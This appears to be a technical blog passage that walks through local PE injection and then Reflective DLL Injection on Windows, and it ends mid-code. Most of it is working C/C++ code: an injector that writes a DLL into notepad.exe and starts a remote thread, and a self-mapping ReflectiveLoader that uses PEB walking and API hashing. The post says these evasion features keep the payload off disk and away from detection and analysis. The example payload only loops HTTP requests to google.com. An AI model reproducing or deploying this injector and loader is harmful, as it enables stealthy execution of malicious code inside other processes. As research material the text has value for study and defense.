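Under this scheme the buffer would be allocated as PAGE_READWRITE, and the returned value would be passed to VirtualProtect for each section after the relocations and IAT have been written. A typical .text section (0x60000020) maps to PAGE_EXECUTE_READ, and a typical .data section (0xC0000040) to PAGE_READWRITE.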

With the new buffer allocated, we then copy the PE headers from the heap to the new buffer.

        // Copy headers to mapped memory space

        DWORD totalHeaderSize = pExePayloadNTHeaders->OptionalHeader.SizeOfHeaders;
        memcpy_s(pExePayloadMapped, totalHeaderSize, pExePayloadUnmapped, totalHeaderSize);

Copy the PE headers to Buffer

PE files on disk store their sections at raw file offsets. We need to read each PE section header to find the virtual address the section will occupy when the file is mapped into memory.

The next code snippet will loop through each PE section header to find the virtual address, and it will copy the section data from the heap buffer to the executable buffer, placing the section in the correct virtual address offset.

        // Map PE sections into mapped memory space

        DWORD numberOfSections = pExePayloadNTHeaders->FileHeader.NumberOfSections;
        PIMAGE_SECTION_HEADER pCurrentSection = (PIMAGE_SECTION_HEADER)(pExePayloadNTHeaders->FileHeader.SizeOfOptionalHeader + (LPBYTE)&(pExePayloadNTHeaders->OptionalHeader));

        for (DWORD i = 0; i < numberOfSections; i++, pCurrentSection++) {

                if (pCurrentSection->SizeOfRawData != 0) {
                        LPBYTE pSourceSectionData = pCurrentSection->PointerToRawData + (LPBYTE)pExePayloadUnmapped;
                        LPBYTE pDestinationSectionData = pCurrentSection->VirtualAddress + (LPBYTE)pExePayloadMapped;
                        DWORD sectionSize = pCurrentSection->SizeOfRawData;

                        memcpy_s(pDestinationSectionData, sectionSize, pSourceSectionData, sectionSize);
                }
        }

Copy the PE sections to Buffer
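
The loop above trusts the offsets and sizes stored in the section headers. For payloads that are not fully trusted, a bounds-checked copy is a safer variation. The sketch below shows the idea on plain byte vectors; SectionInfo and MapSection are hypothetical names introduced here, not types from the post or the Windows SDK.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

// Minimal stand-in for the IMAGE_SECTION_HEADER fields used when mapping.
struct SectionInfo {
    uint32_t virtualAddress;   // RVA of the section once mapped
    uint32_t pointerToRawData; // offset of the section inside the file
    uint32_t sizeOfRawData;    // number of bytes stored on disk
};

// Hypothetical helper: copy one section from the raw file into the mapped
// image, refusing any copy that would run past the end of either buffer.
bool MapSection(const std::vector<uint8_t>& file, std::vector<uint8_t>& image,
                const SectionInfo& s) {
    if (s.sizeOfRawData == 0) return true; // nothing stored on disk (e.g. .bss)

    // 64-bit arithmetic so that offset + size cannot wrap around.
    const uint64_t srcEnd = uint64_t(s.pointerToRawData) + s.sizeOfRawData;
    const uint64_t dstEnd = uint64_t(s.virtualAddress) + s.sizeOfRawData;
    if (srcEnd > file.size() || dstEnd > image.size()) return false;

    std::memcpy(image.data() + s.virtualAddress,
                file.data() + s.pointerToRawData, s.sizeOfRawData);
    return true;
}
```

Here image plays the role of the SizeOfImage-sized buffer returned by VirtualAlloc, and file the heap buffer filled by ReadFile.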

Update the Base Relocation Table

The Base Relocation Table needs to be processed to ensure that any hardcoded address in the payload resolves properly against the new base address. Generally, you would want to check whether a base relocation table is present. In this case we use a static example payload that has one.

        DWORD baseRelocationRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        PIMAGE_BASE_RELOCATION pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)(baseRelocationRVA + (LPBYTE)pExePayloadMapped);

        // Check that a relocation directory exists before reading its first block
        while (baseRelocationRVA != 0 && pCurrentBaseRelocation->VirtualAddress != 0) {

                DWORD relocationEntryCount = (pCurrentBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
                PIMAGE_RELOC pCurrentBaseRelocationEntry = (PIMAGE_RELOC)((LPBYTE)pCurrentBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

                for (DWORD i = 0; i < relocationEntryCount; i++, pCurrentBaseRelocationEntry++) {
                        if (pCurrentBaseRelocationEntry->type == IMAGE_REL_BASED_DIR64) {

                                ULONGLONG* pRelocationValue = (ULONGLONG*)((LPBYTE)pExePayloadMapped + (ULONGLONG)((pCurrentBaseRelocation->VirtualAddress + pCurrentBaseRelocationEntry->offset)));
                                ULONGLONG updatedRelocationValue = (ULONGLONG)((*pRelocationValue - pExePayloadNTHeaders->OptionalHeader.ImageBase) + (LPBYTE)pExePayloadMapped);
                                *pRelocationValue = updatedRelocationValue;
                        }
                }

                // Increment current base relocation entry to the next one, we do this by adding its total size to the current offset
                pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)((LPBYTE)pCurrentBaseRelocation + pCurrentBaseRelocation->SizeOfBlock);
        }

Update the Base Relocation Table
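
To make the arithmetic in the loop concrete: each relocation block is an 8-byte header followed by 16-bit entries, where the high 4 bits hold the type and the low 12 bits hold the offset within the page, and every DIR64 entry is patched by the difference between the actual and preferred base. The sketch below restates that on a plain byte vector. The helper names are hypothetical, and the constants are copied from the PE format so the code compiles without the Windows SDK.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr uint16_t kRelBasedDir64 = 10; // IMAGE_REL_BASED_DIR64

// Each entry is a 16-bit word: high 4 bits type, low 12 bits page offset.
constexpr uint16_t RelocType(uint16_t entry)   { return static_cast<uint16_t>(entry >> 12); }
constexpr uint16_t RelocOffset(uint16_t entry) { return static_cast<uint16_t>(entry & 0x0FFF); }

// A block is an 8-byte header (VirtualAddress, SizeOfBlock) plus 2-byte entries.
constexpr uint32_t RelocEntryCount(uint32_t sizeOfBlock) {
    return sizeOfBlock < 8 ? 0 : (sizeOfBlock - 8) / 2;
}

// Hypothetical helper: patch one 64-bit pointer inside a mapped image.
bool ApplyDir64(std::vector<uint8_t>& image, uint32_t pageRva, uint16_t entry,
                uint64_t preferredBase, uint64_t actualBase) {
    if (RelocType(entry) != kRelBasedDir64) return true; // padding or other type: skip
    const uint64_t at = uint64_t(pageRva) + RelocOffset(entry);
    if (at + sizeof(uint64_t) > image.size()) return false;

    uint64_t value = 0;
    std::memcpy(&value, image.data() + at, sizeof(value));
    value += actualBase - preferredBase; // unsigned wrap-around also covers a lower base
    std::memcpy(image.data() + at, &value, sizeof(value));
    return true;
}
```

For example, a pointer 0x140001234 in an image built for base 0x140000000 becomes 0x7FF600001234 when the image is mapped at 0x7FF600000000.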

Resolve the IAT

Now that the PE Headers and PE Sections are mapped into the buffer the IAT will need to be resolved. This is important as the various functions used by the payload (HttpOpenRequestA, InternetConnectA, …) will not work if the IAT is not correctly updated.

        DWORD importDescriptorRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
        PIMAGE_IMPORT_DESCRIPTOR pMappedCurrentDLLImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importDescriptorRVA + (LPBYTE)pExePayloadMapped);

        while (pMappedCurrentDLLImportDescriptor->Name != NULL && importDescriptorRVA != 0) {
                LPSTR currentDLLName = (LPSTR)(pMappedCurrentDLLImportDescriptor->Name + (LPBYTE)pExePayloadMapped);
                HMODULE hCurrentDLLModule = LoadLibraryA(currentDLLName);

                if (hCurrentDLLModule == NULL) {
                        std::cout << GetLastErrorAsString();
                        return -1;
                }

                PIMAGE_THUNK_DATA64 pImageThunkData = (PIMAGE_THUNK_DATA64)(pMappedCurrentDLLImportDescriptor->FirstThunk + (LPBYTE)pExePayloadMapped);

                while (pImageThunkData->u1.AddressOfData) {

                        if (pImageThunkData->u1.Ordinal & 0x8000000000000000) {
                                // Import is by ordinal

                                FARPROC resolvedImportAddress = GetProcAddress(hCurrentDLLModule, MAKEINTRESOURCEA(pImageThunkData->u1.Ordinal));

                                if (resolvedImportAddress == NULL) {
                                        std::cout << GetLastErrorAsString();
                                        return -1;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }
                        else {
                                // Import is by name
                                PIMAGE_IMPORT_BY_NAME pAddressOfImportData = (PIMAGE_IMPORT_BY_NAME)((pImageThunkData->u1.AddressOfData) + (LPBYTE)pExePayloadMapped);
                                FARPROC resolvedImportAddress = GetProcAddress(hCurrentDLLModule, pAddressOfImportData->Name);

                                if (resolvedImportAddress == NULL) {
                                        std::cout << GetLastErrorAsString();
                                        return -1;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }

                        pImageThunkData++;
                }

                pMappedCurrentDLLImportDescriptor++;
        }

Resolve the IAT
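
The ordinal test in the loop relies on how a 64-bit import thunk is encoded: the top bit marks an ordinal import, the low 16 bits carry the ordinal, and otherwise the low 31 bits are the RVA of an IMAGE_IMPORT_BY_NAME record. A small sketch of that decoding follows, with hypothetical helper names and the flag value copied from winnt.h.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kOrdinalFlag64 = 0x8000000000000000ULL; // IMAGE_ORDINAL_FLAG64

// True when the thunk refers to an export ordinal rather than a name.
constexpr bool IsOrdinalImport(uint64_t thunk) {
    return (thunk & kOrdinalFlag64) != 0;
}

// The ordinal lives in the low 16 bits (what IMAGE_ORDINAL64 extracts).
constexpr uint16_t ImportOrdinal(uint64_t thunk) {
    return static_cast<uint16_t>(thunk & 0xFFFF);
}

// For a by-name import, bits 30-0 hold the RVA of the hint/name record:
// a 2-byte hint followed by the NUL-terminated function name.
constexpr uint32_t ImportByNameRva(uint64_t thunk) {
    return static_cast<uint32_t>(thunk & 0x7FFFFFFF);
}
```

This is also why passing the whole Ordinal field to MAKEINTRESOURCEA works in the loop above: the macro truncates its argument to a WORD, which discards the flag bit.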

Perform a Self Execution

In the end we have a readable, writable, and executable buffer holding a memory-mapped PE file. We can now retrieve the entry point of this PE file and start a new thread in the local process with CreateThread. We call WaitForSingleObject with the INFINITE parameter so the main thread created by the operating system does not exit. Without that call, our main thread would return and the process would end.

            LPTHREAD_START_ROUTINE pExePayloadEntryPoint = (LPTHREAD_START_ROUTINE) (pExePayloadNTHeaders->OptionalHeader.AddressOfEntryPoint + (LPBYTE)pExePayloadMapped);
    
            // dwCreationFlags is a DWORD, so pass 0 (run immediately) rather than NULL
            HANDLE hThread = CreateThread(NULL, 0, pExePayloadEntryPoint, NULL, 0, NULL);
            if (hThread == NULL) {
                    std::cout << GetLastErrorAsString();
                    return -1;
            }
    
            WaitForSingleObject(hThread, INFINITE);

Run Payload as a Thread

Local Portable Executable Injection Demonstration

The following GIF provides a video demonstration of the injection process. We can see the injector running and injecting into itself. Once the injection is successful we can see the output from the PE Payload printing to the console. Likewise, we can see HTTP traffic begin in Wireshark indicating a successful injection.

Injection Video Demonstration

Digging deeper into Process Hacker we can see a readable, writable, and executable memory section in the Injector process. This is the memory section that stores the PE payload which is being executed in a new thread.

Memory Space with Injected PE File

Reflective DLL Injection

Aleks — Wed, 24 May 2023 17:19:55 GMT

Introduction

This post will introduce Reflective DLL Injection along with the steps it takes to implement and execute this technique.

A previous post covered DLL Injection, which uses the LoadLibraryW function to load a DLL from disk into a process via a remotely created thread. The downside of this option is that the DLL is stored on disk. Attackers and malware developers may not always want their payloads on disk, where they can be detected or copied for analysis.

Reflective DLL Injection aims to load a DLL into a specified process, just like traditional DLL Injection, however it aims to do this without dropping the DLL to disk. This is achieved by emulating the Windows Loader and having the DLL load itself in memory so it can be executed.

Source Code for Examples

The source code associated with this post can be found at the following link.

Introduction to DLL Injection

When an executable is launched on Windows it is first mapped into memory, meaning the file is converted from its on-disk representation to its in-memory representation. Multiple parts of the file may require updating, but most files will at minimum require:

Resolution of Import Address Table (IAT) and loading of associated DLLs.
Update values in the Base Relocation Table.

The core of Reflective DLL Injection is injecting a DLL into another process that has the capability to map itself into the same memory space. This has the benefit of keeping the DLL in memory as opposed to the disk.

Reflective DLL Injection Process Diagram Example

The following lists the steps of Reflective DLL Injection:

The Reflective DLL Injector injects the DLL Payload into a target process. The DLL Payload contains a function made of independent code that, when executed, maps the file into memory.
The independent code in the DLL is executed via CreateRemoteThread or any other means.
Through the independent code, the DLL Payload copies itself into another memory buffer in the same process and resolves the IAT and Base Relocation Table.
The independent code then invokes DllMain of the mapped DLL Payload.

💡

The independent code mentioned above could be called shellcode, however, since the code is written in C to be independent and is never transferred anywhere in its pure byte/opcode representation I have decided to call it "Independent Code".

Reflective DLL Payload

The Reflective DLL Payload is the main payload that has the core logic we want to execute in the target process. The file has a function sendHTTPRequest that calls out to Google through an HTTP request. This was picked for example purposes so that there is visible feedback when the payload is executed.

int sendHTTPRequest() {


        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        DWORD_PTR dwService = (DWORD_PTR)NULL;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwService);
        if (httpHandle == NULL) {
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwService);
        if (httpRequestHandle == NULL) {
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);
        InternetCloseHandle(internetHandle);

        return 1;
}

HTTP Request Function that acts as our "Payload"

A function named loopHTTPConnect will loop through the sendHTTPRequest function.

void loopHTTPConnect() {

        while (true) {
                Sleep(5000);
                sendHTTPRequest();
        }

}

Function that loops through the "Payload" function

The loopHTTPConnect function is initially invoked through the DLL's DllMain, which is run when the DLL file is loaded by a process.

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{

        HANDLE hThread = NULL;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
                hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)loopHTTPConnect, NULL, 0, NULL);

                if (hThread == NULL) {
                        return FALSE;
                }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

HTTP Loop Function Invoked in DllMain

Reflective DLL Injector

The Reflective DLL Injector is responsible for injecting the DLL Payload into a target process and invoking the independent code that will help the payload run itself.

This Reflective DLL Injector will take the payload from disk, however, this is only for testing and proof of concept purposes. In a real world scenario the payload could be on disk in an obfuscated or encrypted format, embedded within the Reflective DLL Injector itself, or even downloaded from the network.

When the Reflective DLL Injector gets ahold of the Reflective DLL Payload, the first step is to find the offset of the independent code that will help the Reflective DLL Payload load itself in memory. In this case our independent code is an exported function named ReflectiveLoader. To find its offset we walk the export table and look up the RVA of the ReflectiveLoader function. Because the payload is still in its on-disk layout, that RVA is then converted to a raw file offset, which we use later when creating a remote thread in the target process to execute this code.

        PIMAGE_NT_HEADERS64 pImageNTHeaders = (PIMAGE_NT_HEADERS64)(pDLLPayloadInHeap->e_lfanew + (LPBYTE)pDLLPayloadInHeap);
        PIMAGE_OPTIONAL_HEADER64 pImageOptionalHeader = &pImageNTHeaders->OptionalHeader;


        DWORD virtualAddressOfExportDirectory = pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY) ConvertRVAToOffset(pDLLPayloadInHeap, virtualAddressOfExportDirectory);

        DWORD numberOfNames = pExportDirectory->NumberOfNames;
        DWORD* pAddressOfNames = (DWORD* ) ConvertRVAToOffset(pDLLPayloadInHeap, pExportDirectory->AddressOfNames);
        DWORD reflectiveLoaderExportOffset = 0;

        for (DWORD i = 0; i < numberOfNames; i++) {
                char* currentExportFunctionName = (char*) ConvertRVAToOffset(pDLLPayloadInHeap, pAddressOfNames[i]);

                if (strcmp(currentExportFunctionName, "ReflectiveLoader") == 0) {

                        WORD* pAddressOfNameOrdinals = (WORD*)ConvertRVAToOffset(pDLLPayloadInHeap, pExportDirectory->AddressOfNameOrdinals);
                        WORD currentExportFunctionOrdinal = pAddressOfNameOrdinals[i];

                        DWORD* pAddressOfFunction = (DWORD*)ConvertRVAToOffset(pDLLPayloadInHeap, pExportDirectory->AddressOfFunctions);
                        DWORD reflectiveLoaderRVA = pAddressOfFunction[currentExportFunctionOrdinal];

                        reflectiveLoaderExportOffset = (DWORD)(ConvertRVAToOffset(pDLLPayloadInHeap, reflectiveLoaderRVA) - (ULONG_PTR)pDLLPayloadInHeap);

                        break;
                }
        }

        if (reflectiveLoaderExportOffset == 0) {
                printf("Failed to locate ReflectiveLoader export\n");
                return -1;
        }

Parsing the DLL Payload Export Table to Locate ReflectiveLoader
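
The snippet above leans on a ConvertRVAToOffset helper whose body is not shown here. The following is a sketch of how such a conversion can work, under the assumption that it walks the section headers. RawSection and RvaToFileOffset are hypothetical names, and unlike the post's helper, which appears to return an address inside the heap buffer, this version returns only the file offset.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Minimal stand-in for the IMAGE_SECTION_HEADER fields needed for the lookup.
struct RawSection {
    uint32_t virtualAddress;   // RVA where the section starts once mapped
    uint32_t pointerToRawData; // file offset where the section starts on disk
    uint32_t sizeOfRawData;    // number of bytes stored on disk
};

// Hypothetical helper: translate an RVA into an offset within the raw file.
// Returns false when the RVA is not backed by any bytes on disk.
bool RvaToFileOffset(const std::vector<RawSection>& sections,
                     uint32_t sizeOfHeaders, uint32_t rva, uint32_t& offset) {
    if (rva < sizeOfHeaders) { // the headers sit at the same offset on disk and in memory
        offset = rva;
        return true;
    }
    for (const RawSection& s : sections) {
        if (rva >= s.virtualAddress && rva - s.virtualAddress < s.sizeOfRawData) {
            offset = s.pointerToRawData + (rva - s.virtualAddress);
            return true;
        }
    }
    return false;
}
```

With a section that starts at RVA 0x3000 and file offset 0x1C00, RVA 0x3010 translates to file offset 0x1C10.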

The next section opens a handle to a process named notepad.exe. This is the process we want to inject the DLL Payload into.

        // Find PID of Target Process
        LPCWSTR injectionTargetProcess = L"notepad.exe";
        DWORD injectionTargetProcessID = FindProcessID((LPWSTR)injectionTargetProcess);

        if (injectionTargetProcessID == -1) {
                wprintf(L"Could not find process: %ls", injectionTargetProcess);
                return 0;
        }

        wprintf(L"Injecting into %ls (%d)\n", injectionTargetProcess, injectionTargetProcessID);

        HANDLE hTargetProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, injectionTargetProcessID);
        if (hTargetProcess == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to acquire handle to process: " << errorMessage << "\n";
                return -1;
        }

Open a Handle to notepad.exe

Once a handle is opened to notepad.exe a new buffer is allocated via VirtualAllocEx and the Reflective DLL Payload is copied over to the target process.

        // ReflectiveLoader is executed directly from this buffer, so the pages must be executable
        LPVOID remoteBuffer = VirtualAllocEx(hTargetProcess, NULL, dllPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (remoteBuffer == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to allocate memory in target process: " << errorMessage << "\n";
                return -1;
        }

        if (!WriteProcessMemory(hTargetProcess, remoteBuffer, (LPVOID)pDLLPayloadInHeap, dllPayloadSize, NULL)) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to write payload to target process: " << errorMessage << "\n";

                VirtualFreeEx(hTargetProcess, remoteBuffer, 0, MEM_RELEASE);
                CloseHandle(hTargetProcess);

                return -1;
        }

After running VirtualAllocEx and copying the DLL Payload into the allocated memory, the Reflective DLL Payload is in the target process and we know the offset of the ReflectiveLoader independent code.

The last step involves creating a remote thread in the target process via CreateRemoteThread that will execute the independent code in the ReflectiveLoader function.

        LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE) ((LPBYTE) remoteBuffer + reflectiveLoaderExportOffset);

        HANDLE hThread = CreateRemoteThread(hTargetProcess, NULL, 0, lpStartAddress, NULL, 0, NULL);
        if (hThread == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Remote thread failed " << errorMessage << "\n";

                VirtualFreeEx(hTargetProcess, remoteBuffer, 0, MEM_RELEASE);
                CloseHandle(hTargetProcess);

                return -1;
        }

Create a Remote Thread to Execute the ReflectiveLoader Function in the Target Process Memory Space

Now we have the Reflective DLL Payload loaded in the memory of the target process. However, the file itself is still in its on-disk format, so DllMain cannot yet be called and be expected to run correctly.

Execution has been passed by the Reflective DLL Injector to ReflectiveLoader, our function containing independent code. This is the core code that converts the on-disk representation of the DLL to an in-memory representation and allows us to call DllMain.

Reflective Loading in the DLL Payload

The following expands on the details of the Reflective DLL implementation. The code snippets below are related to the independent code found in ReflectiveLoader.

Find The Base Address of the Reflective DLL Payload

For the DLL file to parse itself, it first needs to know the base address it is located at. The ReflectiveLoader function was called without any parameters and as a result has no information about the environment it is in.

To work this out, it first calls GetCurrentInstructionPointer, which returns its own return address, that is, an address inside ReflectiveLoader just after the call.

__declspec(noinline) ULONG_PTR GetCurrentInstructionPointer(VOID) { return (ULONG_PTR)_ReturnAddress(); }

Helper Function to Retrieve the Instruction Pointer

Once the program knows its current RIP it can scan backwards, toward lower addresses, until it reaches the header of the file. The header of the PE file is identified by the MZ bytes; however, we also check for the PE signature in the NT Headers in order to avoid false positives.

        ULONG_PTR pCurrentInstructionPointer = GetCurrentInstructionPointer();
        PIMAGE_DOS_HEADER pCurrentDLLModule = (PIMAGE_DOS_HEADER)pCurrentInstructionPointer;


        while (TRUE) {

                if (pCurrentDLLModule->e_magic == IMAGE_DOS_SIGNATURE) {

                        // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
                        // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
                        // Reference: https://github.com/stephenfewer/ReflectiveDLLInjection/blob/178ba2a6a9feee0a9d9757dcaa65168ced588c12/dll/src/ReflectiveLoader.c#L94
                        if (pCurrentDLLModule->e_lfanew >= sizeof(IMAGE_DOS_HEADER) && pCurrentDLLModule->e_lfanew < 1024) {
                                PIMAGE_NT_HEADERS64 pSuspectedNtHeaders = (PIMAGE_NT_HEADERS64)(pCurrentDLLModule->e_lfanew + (LPBYTE)pCurrentDLLModule);
                                if (pSuspectedNtHeaders->Signature == IMAGE_NT_SIGNATURE) {
                                        break;
                                }
                        }
                }

                pCurrentDLLModule = (PIMAGE_DOS_HEADER)((LPBYTE)pCurrentDLLModule - 1);
        }

Once this is finished running we will have a pointer to the beginning of the memory space where the DLL has been placed.
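
The same backward scan can be tried out safely on an ordinary byte buffer. The sketch below mirrors the checks in the loop above (MZ magic, an e_lfanew between the DOS header size and 1024, then the PE signature) but adds bounds checks, which the in-process loader cannot do because it does not know where its allocation ends. FindImageBase is a hypothetical name, and a little-endian host is assumed.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical helper: walk backwards from `start` and return the offset of
// the first position that looks like a PE image base, or -1 if none is found.
long long FindImageBase(const std::vector<uint8_t>& mem, size_t start) {
    if (mem.empty()) return -1;
    if (start >= mem.size()) start = mem.size() - 1;

    for (size_t pos = start + 1; pos-- > 0;) {             // visits start, start-1, ..., 0
        if (pos + 0x40 > mem.size()) continue;             // a full DOS header must fit
        if (mem[pos] != 'M' || mem[pos + 1] != 'Z') continue;

        uint32_t lfanew = 0;
        std::memcpy(&lfanew, &mem[pos + 0x3C], sizeof(lfanew));
        if (lfanew < 0x40 || lfanew >= 1024) continue;     // same sanity window as above
        if (pos + lfanew + 4 > mem.size()) continue;

        if (std::memcmp(&mem[pos + lfanew], "PE\0\0", 4) == 0)
            return static_cast<long long>(pos);
    }
    return -1;
}
```

A stray MZ byte pair with an implausible e_lfanew is skipped, which is the false positive the sanity check in the original loop guards against.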

Dynamically load and resolve LoadLibraryA, GetProcAddress, and VirtualAlloc

Since the ReflectiveLoader needs to be independent it cannot invoke any imported functions directly or have any embedded references to strings. This requires us to:

Dynamically resolve the location of Kernel32.dll
Dynamically resolve the addresses of LoadLibraryA, GetProcAddress, and VirtualAlloc
Make use of API Hashing to avoid any references to strings

The API Hash routine is fairly simple and allows us to avoid direct strings in the code (as an alternative, stack strings could have been used). With this API Hash routine we pass in a string and compare the resulting hash against the value we are expecting, such as 0x50c4067, which is the hash for KERNEL32.DLL.

DWORD GetHashFromStringA(LPSTR string) {

        SIZE_T stringSize = GetSizeOfStringA(string);
        DWORD hash = 0x35;

        for (SIZE_T i = 0; i < stringSize; i++) {
                hash += (hash * 0xab10f29e + string[i]) & 0xffffff;
        }

        return hash;
}

API Hashing Algorithm
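The module names stored in the PEB are wide strings, so the loader also calls a GetHashFromStringW variant that is not shown in this post. The following is a minimal portable sketch of how the two variants could share one step function. The names hash_step, hash_ascii, and hash_utf16 are hypothetical, and the wide variant is an assumption about how GetHashFromStringW behaves rather than the actual implementation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One round of the hash from the post: hash += (hash * K + ch) & 0xffffff.
 * uint32_t arithmetic wraps the same way a Windows DWORD does. */
static uint32_t hash_step(uint32_t hash, uint32_t ch)
{
    return hash + ((hash * 0xab10f29eu + ch) & 0xffffffu);
}

/* Narrow-string variant, equivalent to GetHashFromStringA for ASCII input. */
static uint32_t hash_ascii(const char *s)
{
    assert(s != NULL);
    uint32_t hash = 0x35;
    for (size_t i = 0; s[i] != '\0'; i++) {
        hash = hash_step(hash, (unsigned char)s[i]);
    }
    return hash;
}

/* Wide-string variant (assumed): the same rounds over UTF-16 code units. */
static uint32_t hash_utf16(const uint16_t *s)
{
    assert(s != NULL);
    uint32_t hash = 0x35;
    for (size_t i = 0; s[i] != 0; i++) {
        hash = hash_step(hash, s[i]);
    }
    return hash;
}
```

Under this assumption an ASCII name hashes to the same value whether it is stored as a narrow or a wide string, so one constant can serve both lookups. No case folding is performed, so the constant has to be computed from the exact casing that appears in BaseDllName.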

In an x64 process the GS segment register points to the Thread Environment Block (TEB). At offset 0x60 (96 bytes) from the start of the TEB is a pointer to the Process Environment Block (PEB).

We are interested in the PEB as it will provide us access to a data structure listing all the loaded modules in the current process, including the address of Kernel32.dll.

        // Through PEB find the base address of Kernel32.dll

        _PPEB pPEB = (_PPEB)__readgsqword(0x60);
        PLDR_DATA_TABLE_ENTRY pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pPEB->pLdr->InMemoryOrderModuleList.Flink;
        ULONG_PTR pKernel32Module = NULL;

Get a Pointer to the PEB

Each currently loaded module is looped through and the hashed name of that module is compared to the Kernel32.dll string hash that we are expecting. Once the correct string is found the base address of the module is saved.

        do {
                PWSTR currentModuleString = pCurrentPLDRDataTableEntry->BaseDllName.pBuffer;
                if (GetHashFromStringW(currentModuleString) == KERNEL32DLL_HASH) {
                        pKernel32Module = (ULONG_PTR)pCurrentPLDRDataTableEntry->DllBase;
                        break;
                }

                pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pCurrentPLDRDataTableEntry->InMemoryOrderModuleList.Flink;

        } while (pCurrentPLDRDataTableEntry->TimeDateStamp != 0);

Parse the Loaded Modules Looking for Kernel32.dll

After the address of Kernel32.dll is found the functions of interest can be resolved to their address and used later in the program.

        VIRTUALALLOC pVirtualAlloc = (VIRTUALALLOC)GetFunctionOffset(VIRTUALALLOC_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);
        FLUSHINSTRUCTIONCACHE pFlushInstructionCache = (FLUSHINSTRUCTIONCACHE)GetFunctionOffset(FLUSHINSTRUCTIONCACHE_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);
        LOADLIBRARYA pLoadLibraryAAddress = (LOADLIBRARYA)GetFunctionOffset(LOADLIBRARYA_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);
        GETPROCADDRESS pGetProcAddressAddress = (GETPROCADDRESS)GetFunctionOffset(GETPROCADDRESS_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);

Resolve Functions via API Hashing

Make a mapped copy of the Reflective DLL Payload

Now we can start using the Win32 API functions that have been resolved. The first step is to allocate a new buffer space into which the DLL will be mapped.

Note, we are making an exact replica of the DLL Payload that has already been copied into the memory space of the process.

        // Find SizeOfImage from the current DLL in memory
        PIMAGE_NT_HEADERS pCurrentDLLModuleNTHeaders = (PIMAGE_NT_HEADERS)(pCurrentDLLModule->e_lfanew + (LPBYTE)pCurrentDLLModule);
        DWORD sizeOfImageOfCurrentDLLModule = pCurrentDLLModuleNTHeaders->OptionalHeader.SizeOfImage;

        // Allocate enough space to copy the DLL over and map it in memory
        LPVOID pMappedCurrentDLL = pVirtualAlloc(NULL, sizeOfImageOfCurrentDLLModule, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

Allocate a Second Buffer to store a Replica of DLL Payload

The first part of the mapping process is to copy the PE headers into the newly allocated buffer.

        // Copy PE headers to pMappedCurrentDLL
        DWORD sizeOfHeaders = pCurrentDLLModuleNTHeaders->OptionalHeader.SizeOfHeaders;
        for (DWORD i = 0; i < sizeOfHeaders; i++) {
                ((LPBYTE)pMappedCurrentDLL)[i] = ((LPBYTE)pCurrentDLLModule)[i];
        }

Copy the DLL Payload PE Headers into Newly Allocated Memory

Next each PE section will need to be copied to the newly allocated buffer at the virtual address offsets. This is critical to the process of mapping the DLL.

        DWORD numberOfSections = pCurrentDLLModuleNTHeaders->FileHeader.NumberOfSections;

